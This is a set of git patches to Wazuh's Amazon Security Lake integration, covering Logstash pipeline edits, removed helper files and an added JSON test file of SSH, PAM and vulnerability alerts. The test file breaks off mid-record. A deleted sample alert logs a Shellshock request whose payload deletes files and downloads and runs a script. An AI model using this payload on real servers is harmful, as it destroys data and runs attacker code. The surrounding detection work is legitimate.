a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -1,6 +1,6 @@ input { opensearch { - hosts => ["opensearch-node:9200"] + hosts => ["wazuh.indexer:9200"] user => "${INDEXER_USERNAME}" password => "${INDEXER_PASSWORD}" ssl => true From 6938a5456ee66525736a269ee930b218faf4ba0b Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 26 Feb 2024 08:22:16 -0300 Subject: [PATCH 66/77] Change timestamp field in pipeline --- .../pipeline/indexer-to-integrator.conf | 54 ++++++++++--------- 1 file changed, 30 insertions(+), 24 deletions(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index e567587aebc69..4249ef6473033 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -1,32 +1,33 @@ input { - opensearch { - hosts => ["wazuh.indexer:9200"] - user => "${INDEXER_USERNAME}" - password => "${INDEXER_PASSWORD}" - ssl => true - ca_file => "/usr/share/logstash/root-ca.pem" - index => "wazuh-alerts-4.x-*" - query => '{ - "query": { - "range": { - "@timestamp": { - "gt": "now-1m" - } - } - } - }' - target => "_source" - schedule => "* * * * *" - } + opensearch { + hosts => ["wazuh.indexer:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" + index => "wazuh-alerts-4.x-*" + query => '{ + "query": { + "range": { + "timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + ecs_compatibility => disabled + schedule => "* * * * *" + } } output { - stdout - { - id => "standardOutputPipeline" - codec => rubydebug - } + #stdout + #{ + # id => "standardOutputPipeline" + # codec => rubydebug + #} #pipe #{ @@ -36,4 +37,9 @@ output { # command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" #} + file { + id => "fileOutputPipeline" + path => "/tmp/indexer-to-file.json" + } + } From 118b477118021cbefc746796846acab75c0f90f7 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 26 Feb 2024 08:34:14 -0300 Subject: [PATCH 67/77] Clean up unneeded files --- .../amazon-security-lake/parquet/parquet.py | 20 ----- .../amazon-security-lake/parquet/test.py | 11 --- .../wazuh-event.sample.json | 76 ------------------- 3 files changed, 107 deletions(-) delete mode 100644 integrations/amazon-security-lake/parquet/parquet.py delete mode 100644 integrations/amazon-security-lake/parquet/test.py delete mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py deleted file mode 100644 index 79a146f0993a2..0000000000000 --- a/integrations/amazon-security-lake/parquet/parquet.py +++ /dev/null @@ -1,20 +0,0 @@ - -import pyarrow as pa -import pyarrow.parquet as pq -import pyarrow.fs as pafs - - -class Parquet: - - @staticmethod - def encode(data: dict): - return pa.Table.from_pydict(data) - - @staticmethod - def to_s3(data: pa.Table, s3: pafs.S3FileSystem): - pass - - @staticmethod - def to_file(data: pa.Table, path: str): - # pq.write_to_dataset(table=data, root_path=path) - pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py deleted file mode 100644 index 2022111b25e33..0000000000000 --- a/integrations/amazon-security-lake/parquet/test.py +++ /dev/null @@ -1,11 +0,0 @@ -#!/usr/bin/python - -import pyarrow as pa -from parquet import Parquet -import json - -# converted_event = {} -with open("wazuh-event.ocsf.json", "r") as fd: - events = [json.load(fd)] - table = pa.Table.from_pylist(events) - Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json deleted file mode 100644 index d7e0558b62c62..0000000000000 --- a/integrations/amazon-security-lake/wazuh-event.sample.json +++ /dev/null @@ -1,76 +0,0 @@ -{ - "input": { - "type": "log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - "GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" -} \ No newline at end of file From 17b71f01b6669231d4debd8491df77a3f76dcb11 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 26 Feb 2024 08:58:41 -0300 Subject: [PATCH 68/77] Made script available as volume and changed permissions for quick testing --- .../pipeline/indexer-to-integrator.conf | 4 +- .../sl_integration_test.json | 162 ++++++++++++++++++ .../stdin_to_securitylake.py | 2 +- .../transform/__init__.py | 0 .../transform/converter.py | 0 .../transform/models/__init__.py | 0 .../transform/models/ocsf.py | 0 .../transform/models/wazuh.py | 0 integrations/docker/amazon-security-lake.yml | 2 + 9 files changed, 166 insertions(+), 4 deletions(-) create mode 100644 integrations/amazon-security-lake/sl_integration_test.json mode change 100644 => 100755 integrations/amazon-security-lake/transform/__init__.py mode change 100644 => 100755 integrations/amazon-security-lake/transform/converter.py mode change 100644 => 100755 integrations/amazon-security-lake/transform/models/__init__.py mode change 100644 => 100755 integrations/amazon-security-lake/transform/models/ocsf.py mode change 100644 => 100755 integrations/amazon-security-lake/transform/models/wazuh.py diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 4249ef6473033..50e3ec8300674 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -32,9 +32,7 @@ output { #pipe #{ # id => "securityLake" - # message_format => "%{_source}" - # ttl => "10" - # command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + # command => "/usr/share/logstash/bin/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --outputfolder s3://" #} file { diff --git a/integrations/amazon-security-lake/sl_integration_test.json b/integrations/amazon-security-lake/sl_integration_test.json new file mode 100644 index 0000000000000..684f9820c5679 --- /dev/null +++ b/integrations/amazon-security-lake/sl_integration_test.json @@ -0,0 +1,162 @@ +{"@version":"1","_source":{"manager":{"name":"ubuntu2204"},"decoder":{"name":"json"},"rule":{"firedtimes":3,"level":3,"tsc":["CC7.1","CC7.2"],"description":"The CVE-2007-4559 that affected python3.10 was solved due to a package removal/update or a system upgrade","groups":["vulnerability-detector"],"id":"23502","mail":false,"pci_dss":["11.2.1","11.2.3"],"gdpr":["IV_35.7.d"]},"location":"vulnerability-detector","timestamp":"2024-02-15T16:05:11.486-0300","id":"1708023911.181468","@timestamp":"2024-02-15T19:05:11.486Z","agent":{"id":"000","ip":"127.0.0.1","name":"localhost"},"input":{"type":"log"},"data":{"vulnerability":{"severity":"Medium","cvss":{"cvss2":{"base_score":"6.800000"}},"type":"Packages","status":"Solved","title":"CVE-2007-4559 affecting python3.10 was solved","package":{"architecture":"amd64","version":"3.10.6-1~22.04.2ubuntu1","name":"python3.10"},"enumeration":"CVE","updated":"2023-09-17T09:15:07Z","published":"2007-08-28T01:17:00Z","reference":"http://secunia.com/advisories/26623, http://www.vupen.com/english/advisories/2007/3022, http://mail.python.org/pipermail/python-dev/2007-August/074292.html, https://bugzilla.redhat.com/show_bug.cgi?id=263261, http://mail.python.org/pipermail/python-dev/2007-August/074290.html, https://security.gentoo.org/glsa/202309-06","cve":"CVE-2007-4559"}}},"@timestamp":"2024-02-15T19:06:00.230246531Z"} +{"@version":"1","_source":{"manager":{"name":"ubuntu2204"},"decoder":{"name":"json"},"rule":{"firedtimes":3,"level":3,"tsc":["CC7.1","CC7.2"],"description":"The CVE-2007-4559 that affected python3.10 was solved due to a package removal/update or a system upgrade","groups":["vulnerability-detector"],"id":"23502","mail":false,"pci_dss":["11.2.1","11.2.3"],"gdpr":["IV_35.7.d"]},"location":"vulnerability-detector","timestamp":"2024-02-15T16:05:11.486-0300","id":"1708023911.181468","@timestamp":"2024-02-15T19:05:11.486Z","agent":{"id":"000","ip":"127.0.0.1","name":"localhost"},"input":{"type":"log"},"data":{"vulnerability":{"severity":"Medium","cvss":{"cvss2":{"base_score":"6.800000"}},"type":"Packages","status":"Solved","title":"CVE-2007-4559 affecting python3.10 was solved","package":{"architecture":"amd64","version":"3.10.6-1~22.04.2ubuntu1","name":"python3.10"},"enumeration":"CVE","updated":"2023-09-17T09:15:07Z","published":"2007-08-28T01:17:00Z","reference":"http://secunia.com/advisories/26623, http://www.vupen.com/english/advisories/2007/3022, http://mail.python.org/pipermail/python-dev/2007-August/074292.html, https://bugzilla.redhat.com/show_bug.cgi?id=263261, http://mail.python.org/pipermail/python-dev/2007-August/074290.html, https://security.gentoo.org/glsa/202309-06","cve":"CVE-2007-4559"}}},"@timestamp":"2024-02-15T19:06:00.230246531Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral 